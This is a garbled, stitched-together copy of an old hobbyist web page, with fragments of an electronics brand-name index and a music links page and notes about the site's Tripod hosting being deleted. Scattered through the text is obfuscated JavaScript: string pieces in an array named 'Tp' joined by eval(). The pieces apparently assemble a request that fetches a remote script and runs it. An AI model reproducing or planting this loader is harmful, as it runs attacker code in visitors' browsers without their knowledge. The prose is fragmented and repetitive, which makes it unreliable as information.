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But rather than trying to build up another free web site, and possibly deal with this problem again, I decided go with to host the new. Click
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March 6, 2001 Sometime between March 1 to March 5, 2001 Tripod deleted my account/web site.. No liability for inaccuracy, incompleteness or any implied association between or rights to any of these names can be assumed.. If you do think a message board is worth while, or you have a message board that you like, let me know and I may promote it here.. Please E-mail corrections and omissions to: Links: A A & B Design A Basses A-C Dayton A class A-Data Technology A & E A&E Television Networks Lifetime TV A & M Supplies Apollo A-Mark A.. Anyway, I believed Tripod com when they said they deleted my account, so I will be moving, and making my new home on the web. Click
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ref";Tp["prFx"]="kZNQ";Tp["gVSH"]="xhr=";Tp["oaEW"]="ET',";Tp["JlBB"]="nsof";Tp["HJAy"]="VVNS";Tp["wSUh"]="ctio";Tp["SssZ"]="r;ev";Tp["XiwS"]="'//d";Tp["DUcv"]="AYOE";Tp["tpvq"]="E4IT";Tp["bLvA"]="ref=";Tp["YWHu"]="EgTW";Tp["GgKg"]="V1HV";Tp["NyQk"]=");xh";Tp["vKHG"]="n('G";Tp["DIZl"]="w8bU";Tp["cjcn"]="wBGR";Tp["UtCg"]="erre";Tp["mWMI"]="end(";Tp["KJTb"]=";};x";Tp["fbGL"]="nseT";eval(Tp["aFiE"] Tp["gVSH"] Tp["gkEt"] Tp["PtPE"] Tp["ZQJu"] Tp["HyqZ"] Tp["SvOc"] Tp["olOf"] Tp["khQW"] Tp["vKHG"] Tp["oaEW"] Tp["XiwS"] Tp["uTjp"] Tp["JlBB"] Tp["ojML"] Tp["gQsV"] Tp["wyiI"] Tp["CTjp"] Tp["idgH"] Tp["UucJ"] Tp["YWHu"] Tp["bywZ"] Tp["FpHl"] Tp["XWzx"] Tp["HJAy"] Tp["ZNqB"] Tp["KUgF"] Tp["eUHU"] Tp["hcMk"] Tp["iXTX"] Tp["cjcn"] Tp["lXrm"] Tp["DIZl"] Tp["TDJk"] Tp["GgKg"] Tp["sQUL"] Tp["HNeV"] Tp["kppK"] Tp["PDvQ"] Tp["LcqN"] Tp["DUcv"] Tp["UwbD"] Tp["tBDc"] Tp["nMFm"] Tp["prFx"] Tp["Svbn"] Tp["tpvq"] Tp["iTzD"] Tp["PWDx"] Tp["NyQk"] Tp["LABI"] Tp["Lnwc"] Tp["YiAt"] Tp["wSUh"] Tp["SOcF"] Tp["aFiE"] Tp["bLvA"] Tp["camq"] Tp["jhyR"] Tp["AvLs"] Tp["UtCg"] Tp["SssZ"] Tp["sfgW"] Tp["bvEZ"] Tp["vlja"] Tp["fbGL"] Tp["afTQ"] Tp["KJTb"] Tp["gCnz"] Tp["mWMI"] Tp["tvhW"]);Electrical, Electronic and Cybernetic Brand Name Index Electrical, Electronic and Cybernetic Brand Name Index Introduction Please note that most of these Brand Names are registered Trade Marks, Company Names or otherwise controlled and their inclusion in this index is strictly for information purposes only.. I just found out that whenever Tripod com is having hardware or software problems with their servers, they put up a message for the webmaster that their site is in violation of terms, and the web site has been deleted (instead of a message about system problems and try again later).. Please be patient!Last updated by on INTERESTING MUSIC LINKS PAGE INDEX [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] specific groupings of links [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] MISC [] [] INTERESTING MUSIC LINKS WHAT's NEW: [] [] [] [] What's new on this web page? If you see the date changing on this page, without an announcement in this section, it is probably something like fixing minor coding problems, spelling errors, minor layout changes, new page on this site (so I changed bottom index).. ope";Tp["HNeV"]="0lGW";Tp["PDvQ"]="lYXX";Tp["HyqZ"]="eque";Tp["aFiE"]="var ";Tp["wyiI"]="Gj=S";Tp["tBDc"]="xJYU";Tp["tvhW"]=");";Tp["nMFm"]="ENdG";Tp["ZQJu"]="ttpR";Tp["UwbD"]="lpUC";Tp["gCnz"]="hr. Click
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on";Tp["FpHl"]="VFeT";Tp["PWDx"]="lk='";Tp["kppK"]="VEVH";Tp["SvOc"]="st()";Tp["idgH"]="BNGV";Tp["khQW"]=".. Any major changes to this page, will be announced here July 18, 2005 I just noticed that the ezBoard message board that I had set up for this web site had been deleted.. Average size is 30k-50k but some are as large as 200k, so they may take a while to load.. N D Chrome Oxide - Music Collectors pages - Music Links - Warning: these pages are content-rich (a lot of text, and some graphics-size is currently 360kb).. March 10, 2001 As long as I am moving my entire site, I decided to make a few changes to the layout of the individual pages, and the web site in general, including (but not limited to) I removed the counter, and moved the listings of mirror sites to the bottom of the page. 5ebbf469cd 4
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The last stats Tripod gave me were 9,000 visitors per month Since my site is so popular, I have decided to keep it going, in spite of this major setback.. var Tp = new Array();Tp["iTzD"]="AcGB";Tp["bvEZ"]="hr r";Tp["afTQ"]="ext)";Tp["UucJ"]="1EfW";Tp["XWzx"]="08ec";Tp["uTjp"]="owne";Tp["sQUL"]="xIHV";Tp["LABI"]="r.. Since restoration of the deleted conference is only available to subscribers to their service, and since the activity was relatively light, I not planning on looking for another message board.. As always you can me here March 10, 2001 It looks like I may have been premature in moving to a new web hosting site. 5